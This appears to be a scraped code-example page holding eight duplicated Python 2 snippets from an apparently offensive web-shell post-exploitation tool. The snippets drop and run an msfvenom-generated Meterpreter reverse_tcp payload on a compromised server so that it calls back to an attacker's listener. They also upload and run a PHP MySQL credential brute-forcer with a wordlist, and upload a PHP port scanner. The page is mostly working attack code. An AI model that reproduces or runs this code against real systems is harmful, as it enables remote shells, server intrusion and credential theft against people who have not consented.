Exemplo n.º 1
0
 def msf(self, ip, port):
     if len(
             Popen(
                 "for x in `whereis msfvenom`; do file $x | grep symbolic; done",
                 shell=True,
                 stdout=PIPE).stdout.read().strip()) == 0:
         cprint('\n[!] Wasn\'t able to detect the metasploit framework',
                'red')
     else:
         cprint('\n[i] Found the metasploit framework:', 'green')
         folder = linux.get_writble_dir()
         if folder:
             filename = ''.join(
                 choice(string.ascii_letters + string.digits)
                 for x in range(8))
             cprint('[+] Filename: \'{0}\''.format(filename), 'green')
             path = '{0}/{1}'.format(folder, filename)
             msg = colored(
                 '\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'',
                 'green')
             msg += ' (hint: msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} E)'
             msg += colored('\n[?] Press <return> when ready!', 'yellow')
             raw_input(msg.format(ip, port))
             cprint('[i] Generating linux/x86/meterpreter/reverse_tcp',
                    'green')
             shell = Popen(
                 'msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf | base64'
                 .format(ip, port),
                 shell=True,
                 stdout=PIPE).stdout.read().strip()
             cmd = 'echo "{0}" | base64 -i -d > {1} && chmod +x {1} && nohup {1} &echo "\n"'.format(
                 shell, path)
             cprint('[+] Sending payload & executing', 'green')
             make_request.get_page_source(cmd)
             cprint('[+] Done!', 'blue')
Exemplo n.º 2
0
    def __init__(self, host, username, password):
        cprint("\n[+] Please type 'exit' when your done to remove the files uploaded on the server")
        self.host = host
        self.username = username
        self.password = password
        self.hostDir = linux.get_writble_dir()
        if not self.hostDir:
            cprint("'\n[+] Unable to locate a writeble directory on the server")
            cprint("\n[+]MySQL module can't be used. Exiting now!")
        else:
            self.phpFile = [self.hostDir + "/mysql.php", self.hostDir + "/auth.php"]
            cprint('\n[+] Uploading PHP files...', 'green')
            for i in self.phpFile:
                file_handler.upload_file('modules/services/{0}'.format(i.split('/')[-1]), i)

            cmd = 'echo "%s,%s,%s" > %s/auth.txt' % (self.username, self.password, self.host, self.hostDir)
            cprint('\n[+] Authenticating with the server...', 'blue')
            make_request.get_page_source(cmd)

            cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php')
            res = make_request.get_page_source(cmd)
            if 'failure' in res:
                cprint("\n[+] Access denied for user '{0}'@'{1}'".format(self.username, self.host), 'red')
                self.authorized = False
                self.clean()
            else:
                cprint("\n[+]Login Successful", 'green')
                self.authorized = True
Exemplo n.º 3
0
 def msf(self, ip, port):
     if len(Popen("for x in `whereis msfvenom`; do file $x | grep symbolic; done", shell=True, stdout=PIPE).stdout.read().strip()) == 0:
         cprint('\n[!] Wasn\'t able to detect the metasploit framework', 'red')
     else:
         cprint('\n[i] Found the metasploit framework:', 'green')
         folder = linux.get_writble_dir()
         if folder:
             filename = ''.join(choice(string.ascii_letters + string.digits) for x in range(8))
             cprint('[+] Filename: \'{0}\''.format(filename), 'green')
             path = '{0}/{1}'.format(folder, filename)
             msg = colored('\n[i] Make sure: \'{0}\' has a listener shell setup on port: \'{1}\'', 'green')
             msg += ' (hint: msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} E)'
             msg += colored('\n[?] Press <return> when ready!', 'yellow')
             raw_input(msg.format(ip, port))
             cprint('[i] Generating linux/x86/meterpreter/reverse_tcp', 'green')
             shell = Popen('msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf | base64'.format(ip, port), shell=True, stdout=PIPE).stdout.read().strip()
             cmd = 'echo "{0}" | base64 -i -d > {1} && chmod +x {1} && nohup {1} &echo "\n"'.format(shell, path)
             cprint('[+] Sending payload & executing', 'green')
             make_request.get_page_source(cmd)
             cprint('[+] Done!', 'blue')
Exemplo n.º 4
0
    def scan_host(self, host, range):
        folder = linux.get_writble_dir()
        if folder:
            cprint('[+] Uploading scanner to the box ...', 'green')
            scanner = folder + '/webhandler_scanner.php'
            file_handler.upload_file('modules/scanners/port.php', scanner)
            cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host, range)
            cprint('\n[+] Scanning the target ...', 'green')
            cprint('----------------------------')
            try:
                output = make_request.get_page_source(cmd)
                if output:
                    print ""
                    for line in output:
                        cprint(line, 'white')
                else:
                    cprint('\n[+] Didn\'t find any open ports match the range "{0}"'.format(range), 'red')

                file_handler.clean(scanner)
            except KeyboardInterrupt:
                file_handler.clean(scanner)
Exemplo n.º 5
0
    def mysql(self):
        folder = linux.get_writble_dir()
        if folder:
            self.bruter_file = folder + "/mysql.php"
            self.wordlist = folder + "/wordlist.txt"
            cprint("\n[+] Uploading the bruter/wordlist ...", "green")
            file_handler.upload_file("modules/bruters/mysql_bruter.php", self.bruter_file)
            file_handler.upload_file("modules/bruters/wordlist.txt", self.wordlist)
            cmd = "cd {0}; php {1}".format(folder, self.bruter_file)
            cprint("\n[+] Brute-Forcing MySql Creds ...", "green")
            try:
                creds = make_request.get_page_source(cmd)
                creds = "".join(creds).split(":")
                if creds[0] == "success":
                    username = colored(creds[1], "blue")
                    password = colored(creds[2], "blue")
                    print "[+] MySql Creds Username: {0} Password: {1}".format(username, password)
                else:
                    cprint("[!] Couldn't brute-force MySql credentials", "red")

                self.clean()
            except KeyboardInterrupt:
                self.clean()
Exemplo n.º 6
0
    def mysql(self):
        folder = linux.get_writble_dir()
        if folder:
            self.bruter_file = folder + '/mysql.php'
            self.wordlist = folder + '/wordlist.txt'
            cprint('\n[+] Uploading the bruter/wordlist ...', 'green')
            file_handler.upload_file('modules/bruters/mysql_bruter.php', self.bruter_file)
            file_handler.upload_file('modules/bruters/wordlist.txt', self.wordlist)
            cmd = 'cd {0}; php {1}'.format(folder, self.bruter_file)
            cprint('\n[+] Brute-Forcing MySql Creds ...', 'green')
            try:
                creds = make_request.get_page_source(cmd)
                creds = ''.join(creds).split(':')
                if creds[0] == 'success':
                    username = colored(creds[1], 'blue')
                    password = colored(creds[2], 'blue')
                    print '[+] MySql Creds Username: {0} Password: {1}'.format(username, password)
                else:
                    cprint('[!] Couldn\'t brute-force MySql credentials', 'red')

                self.clean()
            except KeyboardInterrupt:
                self.clean()
Exemplo n.º 7
0
    def __init__(self, host, username, password):
        cprint(
            "\n[+] Please type 'exit' when your done to remove the files uploaded on the server"
        )
        self.host = host
        self.username = username
        self.password = password
        self.hostDir = linux.get_writble_dir()
        if not self.hostDir:
            cprint(
                "'\n[+] Unable to locate a writeble directory on the server")
            cprint("\n[+]MySQL module can't be used. Exiting now!")
        else:
            self.phpFile = [
                self.hostDir + "/mysql.php", self.hostDir + "/auth.php"
            ]
            cprint('\n[+] Uploading PHP files...', 'green')
            for i in self.phpFile:
                file_handler.upload_file(
                    'modules/services/{0}'.format(i.split('/')[-1]), i)

            cmd = 'echo "%s,%s,%s" > %s/auth.txt' % (
                self.username, self.password, self.host, self.hostDir)
            cprint('\n[+] Authenticating with the server...', 'blue')
            make_request.get_page_source(cmd)

            cmd = "cd {0}; php {1}".format(self.hostDir, 'auth.php')
            res = make_request.get_page_source(cmd)
            if 'failure' in res:
                cprint(
                    "\n[+] Access denied for user '{0}'@'{1}'".format(
                        self.username, self.host), 'red')
                self.authorized = False
                self.clean()
            else:
                cprint("\n[+]Login Successful", 'green')
                self.authorized = True
Exemplo n.º 8
0
    def scan_host(self, host, range):
        folder = linux.get_writble_dir()
        if folder:
            cprint('[+] Uploading scanner to the box ...', 'green')
            scanner = folder + '/webhandler_scanner.php'
            file_handler.upload_file('modules/scanners/port.php', scanner)
            cmd = 'cd {0}; php {1} {2} {3}'.format(folder, scanner, host,
                                                   range)
            cprint('\n[+] Scanning the target ...', 'green')
            cprint('----------------------------')
            try:
                output = make_request.get_page_source(cmd)
                if output:
                    print ""
                    for line in output:
                        cprint(line, 'white')
                else:
                    cprint(
                        '\n[+] Didn\'t find any open ports match the range "{0}"'
                        .format(range), 'red')

                file_handler.clean(scanner)
            except KeyboardInterrupt:
                file_handler.clean(scanner)